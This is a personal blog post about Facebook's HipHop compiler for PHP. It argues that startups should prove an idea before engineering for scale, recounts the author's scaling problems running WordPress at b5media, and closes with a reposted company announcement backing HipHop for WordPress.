That’s all fair, but I feel like the problem here is that somewhere a long, long time ago, Facebook *must* have realized that they were going to have scaling problems. Long before they started having a problem, someone *must* have thought “maybe a compile-at-runtime language isn’t the right solution here”. I guess to me this cross-compiler is just a public way to admit that PHP is not the right tool for the job, but they’re stuck with all these developers that only know PHP so it was somehow cheaper to engineer a way to change PHP to C++ than it was to retrain developers on C++ (or, probably more realistic, Java).

I responded in that conversation with an only slightly edited response. While I appreciate, and always have appreciated, his frank, honest, high level view of PHP, web security, web applications, etc., he strikes me as somewhat naive and puritanical.

What I can say is *I*, along with dozens of other technology people in and out of DC, in and out of PHP, never look at our initial ideas as scaling ideas. We look at them as ideas and experiments to see if they have legs. In fact, I’d go so far as to say it is counter-productive to think about scale before thinking of concievability (is that a word?).

There’s a reason why Rails (God help us) is popular. It’s a great prototyping tool. You stand up an app quickly and let it into the wild to see if it has legs. Does it go? What are the market influences? What are the
pros and cons? Do we have to adjust?

After a concept is proven, then a solid dev team with solid tech leadership brings in their expertise to see if the idea can be built into something sustainable. As a sidebar, please take a read of Brad Feld’s very awesome
post from a few years ago “The first 25,000 Users are Irrelevant“.

My point is, it’s silly and a waste of resources for startup people to start thinking about how big they might get maybe 5 years down the road. I think you’d find out that, in most cases, successful technology, web-based companies happened by some dumb luck. Twitter. Facebook. Name-the-popular-app. Dumb luck.

Hey, I’d even argue that when too much comp-sci brain energy goes into an app, you get things like Wolfram Alpha. Cool. But useless. And not nimble enough to actually do the scaling necessary to need all that comp-sci engineering prowess.

Balance, my friend. Balance.

Facebook (and others) start with PHP because PHP is fairly ubiquitous and easy as pie to drop into production. However, there is a point of no return where you are committed to PHP and that’s where HipHop comes in.

Personally, I wish we had HipHop when I was at b5media. We had a ton of scaling problems with PHP and we were running fully clustered Apache servers (25 deep, if I recall), sharded MySQL across 6ish database servers, and we had massive I/O bottlenecks. We ran eAccelerator and Memcached and had squid-based load balancing and damn if Grey’s Anatomy or the Oscar’s didn’t pin our entire network on more than one occasion. What could have happened with an alternate to opcode caching. What could have happened if I had resources to put on developing C++ binaries of our frequently used PHP libraries.

I’ll tell you. It would have rocked. We were already committed to PHP. We were already committed to WordPress. And when the company started, we were all volunteer resources. There was no assumption that our idea had legs or I think everyone on the team would have quit our jobs immediately and put everything into building that company. It took a year to get there.

This is, for better or for worse, the way companies get started in the real world.

Facebook's HipHop and What it Means to WordPress

This was originally posted on my company blog and reposted here for posterity.

By now, the news has hit the street about Facebook’s new PHP pseudo-compiler technology that is looking set to change the PHP world once again. It is called HipHop for PHP.

Here at Emmense, we build on PHP and more specifically, we build on WordPress. The PHP community as a whole continues to innovate the language and Facebook has been a longstanding member of that community. WordPress stands on the shoulders who have gone before, and there are certainly instances of large-scale installs of WordPress that could stand to use some acceration.

It is our intention, here at Emmense, to support the Facebook HipHop methodology where appropriate. We will be exploring the use and implementation of this technology in the days and weeks to come and will be working to build solutions that leverage it in the WordPress world for our clients. Where possible, our work will be conributed back to the WordPress core where appropriate.

While we expect that many more service providers will likely leverage this technology, we want to continue to lead in the WordPress community in an ever-open exchange of ideas between the PHP and WordPress communities.